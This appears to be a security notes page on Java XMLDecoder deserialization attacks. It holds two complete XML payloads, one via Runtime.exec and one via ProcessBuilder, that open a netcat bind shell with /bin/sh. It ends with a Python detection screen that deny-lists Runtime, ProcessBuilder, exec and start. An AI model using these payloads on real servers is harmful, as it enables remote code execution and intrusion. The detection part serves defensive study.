# XMLDecoder

**XMLDecoder** is a Java class that **creates objects** from an XML document. If a malicious user can get an application to pass attacker-controlled data into a call to its **readObject** method, they gain code execution on the server, because the XML can name arbitrary classes and methods for the decoder to invoke.

**XMLDecoder** reads the XML form of a serialized object and recreates it; **readObject** performs the deserialization.

For the bind shell Java snippet below, we can create an XML document that invokes the Java Runtime.exec() method with the command in array form.

```java
Runtime run = Runtime.getRuntime();
String[] commands = new String[] {"/usr/bin/nc", "-l", "-p", "9999", "-e", "/bin/sh"};
run.exec(commands);
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
    <object class="java.lang.Runtime" method="getRuntime">
        <void method="exec">
            <array class="java.lang.String" length="6">
                <void index="0">
                    <string>/usr/bin/nc</string>
                </void>
                <void index="1">
                    <string>-l</string>
                </void>
                <void index="2">
                    <string>-p</string>
                </void>
                <void index="3">
                    <string>9999</string>
                </void>
                <void index="4">
                    <string>-e</string>
                </void>
                <void index="5">
                    <string>/bin/sh</string>
                </void>
            </array>
        </void>
    </object>
</java>
```

## Process Builder

Instead of Runtime.exec(), we can also use the ProcessBuilder class in Java to execute the command.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="6">
            <void index="0">
                <string>/usr/bin/nc</string>
            </void>
            <void index="1">
                <string>-l</string>
            </void>
            <void index="2">
                <string>-p</string>
            </void>
            <void index="3">
                <string>9999</string>
            </void>
            <void index="4">
                <string>-e</string>
            </void>
            <void index="5">
                <string>/bin/sh</string>
            </void>
        </array>
        <void method="start" id="process"></void>
    </void>
</java>
```
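As an added defensive example (not part of the original notes), the following Python screen parses an XMLDecoder document and flags the constructs used in both payloads above: a `class` attribute naming `java.lang.Runtime` or `java.lang.ProcessBuilder`, or a `method` attribute invoking `exec` or `start`. The deny-lists and the two sample documents are constructed for this example.

```python
import xml.etree.ElementTree as ET

# Deny-lists built from the payload shapes discussed above. A deny-list is a
# detection aid for logs or gateways; untrusted XML should not reach XMLDecoder at all.
DANGEROUS_CLASSES = {"java.lang.Runtime", "java.lang.ProcessBuilder"}
DANGEROUS_METHODS = {"exec", "start"}

# Constructed sample: an ordinary XMLEncoder-style document rebuilding a HashMap.
BENIGN_SAMPLE = """<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.util.HashMap">
    <void method="put"><string>color</string><string>blue</string></void>
  </object>
</java>"""

# Constructed sample mirroring the Runtime.exec() payload shape shown above.
MALICIOUS_SAMPLE = """<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <array class="java.lang.String" length="1">
        <void index="0"><string>id</string></void>
      </array>
    </void>
  </object>
</java>"""


def find_dangerous_constructs(xml_text):
    """Return a list of (element_tag, reason) findings for an XMLDecoder document.

    Every element is inspected, regardless of what the root claims to be, because
    the decoder does not require the class="java.beans.XMLDecoder" attribute.
    Malformed XML is reported as a finding so it is not silently waved through.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as err:
        return [("parse", f"malformed XML: {err}")]
    findings = []
    for elem in root.iter():
        cls = elem.get("class")
        if cls in DANGEROUS_CLASSES:
            findings.append((elem.tag, f"references class {cls}"))
        method = elem.get("method")
        if method in DANGEROUS_METHODS:
            findings.append((elem.tag, f"invokes method {method}"))
    return findings


def is_safe(xml_text):
    """True only when the screen found nothing to report."""
    return not find_dangerous_constructs(xml_text)
```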
